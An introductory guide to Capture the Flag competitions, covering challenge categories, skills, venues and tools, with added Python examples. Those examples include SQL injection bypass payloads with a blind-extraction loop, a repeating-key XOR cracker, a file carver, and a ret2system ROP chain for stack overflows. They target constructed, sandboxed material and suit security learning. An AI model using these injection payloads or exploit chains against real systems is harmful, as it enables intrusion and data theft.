Getting Started in Capture the Flag (CTF) Competitions
Capture the Flag (CTF) is one of the most interesting ways to learn cybersecurity. Learning through playing is an effective way to build your skills and get started in the field. This article covers the basics of capture the flag (CTF) competitions: what they are, the kinds of challenges you will meet, the tools used for each category, and where to play. It is written for newcomers to these competitions and for anyone who wants the skills to get started in cybersecurity or to move into an infosec career.
What is CTF?
CTF stands for Capture The Flag. It is a type of cybersecurity competition or game in which the goal is to locate a specific piece of text, called a flag, that has been hidden on a server, inside a file, or behind a web page. A CTF simulates real-world scenarios such as breaking into a remote host or exploiting a vulnerability in a specific application, but in a sandboxed environment built for that purpose. There are two common types of CTFs: Jeopardy and Attack-Defence.
Type 1 => Jeopardy CTF
This type consists of independent problems (challenges) in categories such as web, digital forensics, reverse engineering and others. Teams or individuals gain points for every challenge they solve. Points depend on the challenge's difficulty, so challenges labelled as hard are worth more points.
Type 2 => Attack-Defence
Here each team is given its own network of deliberately vulnerable services (or just one host). The team typically gets a setup window to patch the vulnerabilities in its own services before the attacks begin. You then defend your own services to earn defence points, while attacking the other teams' copies of the same services to steal their flags and earn attack points.
What is a Flag ?
A flag is a string, typically in a fixed format such as flag{...} or a hash-like hex string, that you submit to the CTF portal to get the challenge's points (e.g. flag{congr4tz_th!5_!5_fl4g}). The format is usually stated in the competition rules, which makes a flag easy to recognise when it shows up in a file or in a tool's output.
What is a Writeup?
A writeup is a full description of how a certain challenge was solved. Reading writeups will teach you new techniques and enhance your CTF skills. However, read the writeup only when you are really stuck on the challenge; most of the learning happens while you are struggling with it.
Challenge types
Jeopardy-style CTF challenges are typically divided into different categories. You will find the most common types below.
Type 1 => Cryptography - These challenges involve understanding the different encryption algorithms and breaking weak or misused ones, from classical ciphers and XOR to RSA with badly chosen parameters.
Type 2 => Digital Forensics - These challenges involve file format analysis, steganography, memory dump analysis, or network packet capture analysis.
Type 3 => Reverse Engineering - These challenges involve taking compiled code, such as .exe or .apk files, and converting it back into a more human-readable form (disassembly or decompilation) to understand what it does.
Type 4 => Web Security - These challenges involve discovering and exploiting vulnerabilities in web applications.
Type 5 => Exploitation - These challenges involve exploiting a service (usually a vulnerable binary) to obtain the flag. Reverse engineering techniques are applied here too, to analyse the structure and behaviour of the binary before writing the exploit.
Type 6 => Network Security - These challenges involve analysing traffic data such as pcap files.
Type 7 => Open Source Intelligence (OSINT) - These challenges involve using open source tools and publicly available information to gather intelligence about a target.
What skills are needed to play CTFs?
Playing capture the flag (CTF) competitions requires some basic prerequisite skills. You will need basic knowledge of networking, such as subnetting, TCP/IP and routing. It is also important to know some Linux commands, because most of the tools are run from the command line, typically on Kali Linux. In addition, basic programming skills are needed: you might not have to write code for some types of challenges, but you at least need to be able to read code and understand what it does. The most important skill, though, is persistence. You won't solve challenges on the first day; expect to practise for days and nights before you solve your first group of challenges. So don't give up easily and keep trying.
Where can I play CTFs ?
There are different websites where you can play online CTFs. The main site for finding upcoming CTFs is CTFtime.org, a calendar of upcoming CTFs happening around the world on different platforms. You can also check the upcoming competitions on CyberTalents. In addition, you can take part in well-known competitions such as Google CTF, the CTF run by Google.
Tools
In order to start in capture the flag (CTF) competitions, we have listed some of the basic tools you can use, grouped by challenge category.
WEB
Burp Suite : commonly used tool for testing web applications; among its many features is Burp Proxy, which intercepts HTTP requests and responses and lets you modify them before they are forwarded.
Cookie Editor : browser extension for viewing and editing cookies.
SQLMap : automated SQL injection detection and database exploitation tool.
DirBuster : directory and file brute-forcing tool for finding hidden paths on a web server.
XSSer : tool to detect, exploit and report XSS vulnerabilities.
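As an added example (not from the original article and not SQLMap's own code), here is what SQLMap automates, written in Python against an in-memory SQLite database constructed for the purpose: a login query built by string concatenation, the classic comment and always-true bypasses against it, a boolean-based blind extraction that recovers a column one character at a time, and the parameterised form that stops all of it. The table contents and the flag value are made up.

```python
import sqlite3
import string

# Characters the blind probe will try; quotes are left out because they would
# break the probe's own SQL rather than test a character.
CHARSET = string.ascii_letters + string.digits + "-_{}!?@#$"


def make_db():
    """Constructed in-memory stand-in for a web app's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, flag TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cr3t-admin-pw', 'flag{constructed_example}')")
    db.execute("INSERT INTO users VALUES ('guest', 'guest', NULL)")
    return db


def login_vulnerable(db, username, password):
    """Vulnerable: user input is pasted into the SQL text, so a quote ends the
    string literal and whatever follows it is parsed as SQL."""
    query = ("SELECT username, flag FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone()


def login_safe(db, username, password):
    """Hardened: placeholders send the values separately from the SQL text, so
    quotes, comments and operators in the input are only ever compared as data."""
    query = "SELECT username, flag FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()


def blind_extract(oracle, username, column, charset=CHARSET, max_len=32):
    """Boolean-based blind injection: the login only answers yes/no (a row or no
    row), so ask 'is character N of <column> equal to X?' for each position until
    no character matches. This is the loop sqlmap runs when nothing is echoed back."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = "%s' AND substr(%s,%d,1)='%s'-- " % (username, column, pos, ch)
            if oracle(probe, "irrelevant") is not None:
                recovered += ch
                break
        else:
            break  # nothing matched: we are past the end of the string
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Comment injection: the rest of the WHERE clause, password check included, is discarded.
    print(login_vulnerable(db, "admin'-- ", "wrong"))
    # Always-true clause: AND binds tighter than OR, so every row matches.
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))
    print(blind_extract(lambda u, p: login_vulnerable(db, u, p), "admin", "password"))
    # The same inputs against the parameterised query match nothing.
    print(login_safe(db, "admin'-- ", "wrong"))
    print(blind_extract(lambda u, p: login_safe(db, u, p), "admin", "password"))
```

Tools like SQLMap add time-based and error-based variants of the same oracle, detect the database type, and handle encoding and WAF evasion, but the core of the attack is exactly this loop.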
Crypto
rsatool : calculates RSA and RSA-CRT parameters (for example, rebuilding a private key from p, q and e).
CyberChef : web app for analysing, encoding and decoding data.
PkCrack : tool for breaking PkZip encryption using a known-plaintext attack.
quipqiup : online tool for breaking substitution ciphers (and Vigenere ciphers) without the key.
XORTool : tool to analyse multi-byte XOR ciphers; it guesses the key length and then the key itself.
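Repeating-key XOR is the most common "toy" cipher in the crypto category, so as an added example (not from the article and not XORTool's own code) here is the attack that XORTool-style tools automate: rank candidate key lengths by the normalised Hamming distance between consecutive ciphertext blocks, crack each key byte on its own with English letter-frequency scoring, and collapse a key that came out as a repetition of a shorter one. The plaintext and key below are constructed for the example.

```python
# Rough English letter frequencies (percent); space is the most common byte in prose.
FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0, "h": 6.1,
    "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7, "o": 7.5, "p": 1.9,
    "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8, "v": 0.98, "w": 2.4, "x": 0.15,
    "y": 2.0, "z": 0.074, " ": 13.0,
}


def english_score(data):
    """Higher means 'looks more like English'. Unprintable bytes are heavily
    penalised, which is what makes a wrong key byte lose even on short columns."""
    score = 0.0
    for b in data:
        c = chr(b)
        if c in FREQ:
            score += FREQ[c]
        elif c.lower() in FREQ:          # uppercase letter: plausible but rarer
            score += FREQ[c.lower()] / 2
        elif 32 <= b < 127 or b in (9, 10, 13):
            score += 0.5                 # digits and punctuation: neutral
        else:
            score -= 20                  # control or high bytes: not text
    return score


def xor_repeating(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def crack_single_byte(column):
    """Best single key byte for one column (all bytes XORed with the same key byte)."""
    return max(range(256), key=lambda k: english_score(bytes(b ^ k for b in column)))


def hamming(a, b):
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def rank_key_lengths(ct, max_len=16):
    """Candidate key lengths, best first. At the true length (and its multiples)
    consecutive blocks were XORed with the same key bytes, so their normalised
    Hamming distance is just that of English text with itself, which is lower
    than for any other length."""
    scored = []
    for length in range(1, max_len + 1):
        blocks = [ct[i:i + length] for i in range(0, len(ct) - length + 1, length)]
        if len(blocks) < 2:
            break
        total = sum(hamming(x, y) for x, y in zip(blocks, blocks[1:]))
        scored.append((total / ((len(blocks) - 1) * length), length))
    return [length for _, length in sorted(scored)]


def smallest_period(key):
    """A key cracked at a multiple of its real length comes out repeated; collapse it."""
    for p in range(1, len(key) + 1):
        if len(key) % p == 0 and key == key[:p] * (len(key) // p):
            return key[:p]
    return key


def recover_key(ct, candidates=3):
    """Try the top candidate lengths, crack each column independently, keep the
    key whose decryption scores best per byte, then strip any repetition."""
    best_score, best_key = None, None
    for length in rank_key_lengths(ct)[:candidates]:
        key = bytes(crack_single_byte(ct[i::length]) for i in range(length))
        score = english_score(xor_repeating(ct, key)) / len(ct)
        if best_score is None or score > best_score:
            best_score, best_key = score, key
    return smallest_period(best_key)


# Constructed sample: English plaintext and a 5-byte key, not from any real challenge.
SAMPLE_KEY = b"CTF!k"
SAMPLE_PLAINTEXT = (
    b"Capture the flag competitions teach you to look at every byte twice. The crypto "
    b"category often hides a short repeating key behind a long stream of bytes, and the "
    b"trick is that English text is not random: spaces and the letter e show up far more "
    b"often than anything else, so each key byte can be recovered on its own once the key "
    b"length is known. Practice on small examples first, then write your own tools and "
    b"keep them for the next event, because the same ideas come back in every competition."
)
CIPHERTEXT = xor_repeating(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(CIPHERTEXT)
    print("recovered key:", key)
    print(xor_repeating(CIPHERTEXT, key).decode())
```

The same column-splitting trick works for any cipher that reuses a short key byte-by-byte; what changes between challenges is only the scoring function (for example, when the plaintext is known to be a PNG or a zip file rather than English).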
Digital Forensics
ExifTool : reads, writes and edits metadata in a wide variety of file types (e.g. JPEG, PNG, PDF); flags are often left in metadata fields such as comments.
Wireshark : tool for analysing network traffic and PCAP files (Linux install: apt-get install wireshark).
Audacity : tool for analysing audio files (e.g. .mp3, .wav), including their waveform and spectrogram.
Foremost : carves files out of disk images or arbitrary data based on their headers, footers, and internal data structures.
Stegsolve : applies different colour-plane and bit-plane filters to images to reveal hidden data.
Volatility : framework for investigating memory dumps.
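Foremost and similar carvers work from file signatures rather than file names. As an added example (not the article's or Foremost's code), the Python below carves PNG and JPEG files out of a blob: PNGs by walking the chunk structure and checking every chunk's CRC, so that a truncated or corrupted PNG is not reported, JPEGs by header and the first end-of-image footer after it. It then greps the recovered files for a flag{...}-style string of the kind described under "What is a Flag?". The blob, the 1x1 PNG and the minimal JPEG are constructed inline.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8\xff"   # start of image followed by a marker byte
JPEG_EOI = b"\xff\xd9"       # end of image
FLAG_RE = re.compile(rb"flag\{[^}]{1,100}\}")


def png_chunk(ctype, data):
    """Length, type, data, CRC32 over type+data: the PNG chunk layout."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF))


def build_png_1x1():
    """Constructed, valid 1x1 RGB PNG (one red pixel) used as sample input."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, RGB
    scanline = b"\x00" + b"\xff\x00\x00"                 # filter type 0 + one pixel
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline)) + png_chunk(b"IEND", b""))


def png_end(blob, start):
    """Walk the chunk list from a signature at `start`; return the offset just past
    IEND, or None if a chunk is truncated or its CRC is wrong (not a usable PNG)."""
    pos = start + len(PNG_SIG)
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        if pos + 12 + length > len(blob):
            return None
        data = blob[pos + 8:pos + 8 + length]
        crc, = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            return None
        pos += 12 + length
        if ctype == b"IEND":
            return pos
    return None


def carve(blob):
    """Foremost-style carving: PNG by structure walk, JPEG by SOI header and the
    first EOI footer after it. Returns (kind, offset, bytes) tuples."""
    found = []
    i = 0
    while i < len(blob):
        if blob.startswith(PNG_SIG, i):
            end = png_end(blob, i)
            if end is not None:
                found.append(("png", i, blob[i:end]))
                i = end
                continue
        elif blob.startswith(JPEG_SOI, i):
            end = blob.find(JPEG_EOI, i + len(JPEG_SOI))
            if end != -1:
                found.append(("jpg", i, blob[i:end + len(JPEG_EOI)]))
                i = end + len(JPEG_EOI)
                continue
        i += 1
    return found


def find_flags(data):
    return [m.decode() for m in FLAG_RE.findall(data)]


# Constructed sample: a JPEG skeleton (SOI, APP0/JFIF, a COM comment segment carrying
# the flag, EOI) with no real image data, and a blob with filler around both files.
COMMENT = b"flag{constructed_jpeg_comment}"
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10" + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\xff\xfe" + struct.pack(">H", len(COMMENT) + 2) + COMMENT
               + b"\xff\xd9")
SAMPLE_BLOB = b"junk data " * 3 + build_png_1x1() + b"\x00" * 16 + SAMPLE_JPEG + b"more junk"

if __name__ == "__main__":
    for kind, offset, data in carve(SAMPLE_BLOB):
        print(kind, "at offset", offset, "size", len(data), "flags:", find_flags(data))
```

Real carvers add more signatures and heuristics (maximum file sizes, skipping nested JPEG thumbnails), but the two strategies here, a structure walk where the format allows it and a header/footer search where it does not, are the ones Foremost's configuration file describes.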
Reverse
IDA Pro : the most widely used disassembler and debugger.
Exploitation
DLLInjector : injects DLLs into running processes.
libformatstr : simplifies format string exploitation.
Metasploit : penetration testing framework with a large library of exploits and payloads.
one_gadget : finds "one gadget" addresses in a glibc build, i.e. single locations that spawn a shell (execve("/bin/sh")) when jumped to, each with its own constraints on register and stack state.
Pwntools : CTF framework and exploit development library for writing exploits.
Qira : QEMU Interactive Runtime Analyser.
ROPgadget : tool for finding gadgets in binaries and building ROP chains.
V0lt : security CTF toolkit.
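As an added example that is not from the article or from Pwntools, here is the part of a stack-overflow exploit that Pwntools' cyclic/cyclic_find and p64 helpers cover, reimplemented in plain Python: a de Bruijn pattern to find the exact offset of the saved return address from the value the debugger shows at the crash, a ret2system ROP chain for x86-64 packed as little-endian 64-bit words, and a bad-byte check. The gadget and symbol addresses are hypothetical placeholders, not from any real binary; in a real challenge you read them from ROPgadget, objdump or the PLT.

```python
import string
import struct

ALPHABET = string.ascii_lowercase


def cyclic(length, n=4):
    """First `length` bytes of a de Bruijn sequence over a-z: every n-byte window
    is unique, so a crash value tells you exactly which offset overwrote the
    return address. Same construction (and output) as pwntools.cyclic."""
    k = len(ALPHABET)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= length:
            return
        if t > n:
            if n % p == 0:
                out.extend(ALPHABET[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(out[:length]).encode()


def cyclic_find(value, n=4, search_len=20000):
    """Offset of a crash value inside the pattern. Accepts the raw bytes read from
    the stack or the integer shown by the debugger (little-endian, low n bytes)."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)[:n]
    return cyclic(search_len, n).find(value[:n])


def p64(v):
    """Pack a 64-bit little-endian word, as the stack expects on x86-64."""
    return struct.pack("<Q", v)


# Hypothetical addresses for a non-PIE x86-64 binary (placeholders, not a real target).
POP_RDI_RET = 0x00401203   # pop rdi ; ret
RET         = 0x0040101a   # ret
BINSH_STR   = 0x00404040   # "/bin/sh" in .data
SYSTEM_PLT  = 0x00401060   # system@plt


def build_ret2system(offset):
    """Overwrite the saved return address with a chain that calls system("/bin/sh")."""
    payload = b"A" * offset       # filler up to the saved return address
    payload += p64(RET)           # extra ret keeps rsp 16-byte aligned for system()
    payload += p64(POP_RDI_RET)   # pop rdi ; ret
    payload += p64(BINSH_STR)     #   rdi = "/bin/sh"
    payload += p64(SYSTEM_PLT)    # system(rdi)
    return payload


def bad_bytes(payload, avoid):
    """Offsets of bytes the input path would stop at or mangle (e.g. b"\\n" for
    gets/fgets, b"\\x00" for strcpy)."""
    return [i for i, b in enumerate(payload) if b in avoid]


if __name__ == "__main__":
    # Step 1: crash the target with a pattern and read the value at the top of the
    # stack; the value below is what 'kaaa' at offset 40 looks like on x86-64.
    print(cyclic(64))
    print("offset:", cyclic_find(0x6161616c6161616b))
    # Step 2: build the chain at that offset and check it survives the input path.
    payload = build_ret2system(40)
    print(payload)
    print("newline bytes at:", bad_bytes(payload, b"\n"))
    print("null bytes at:", bad_bytes(payload, b"\x00"))
```

The null-byte check is there because the chain contains nulls in every address (the high bytes of a non-PIE code address are zero); that is fine for gets() and read(), which only stop at a newline or the byte count, but not for a strcpy-based overflow, where a different technique is needed.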
Conclusion
Solving the challenges might be hard at the beginning, but once you start to practise, join the community and compete in a few competitions, you will find that playing capture the flag (CTF) competitions is an effective way to learn cybersecurity, build a reputation and gain access to jobs.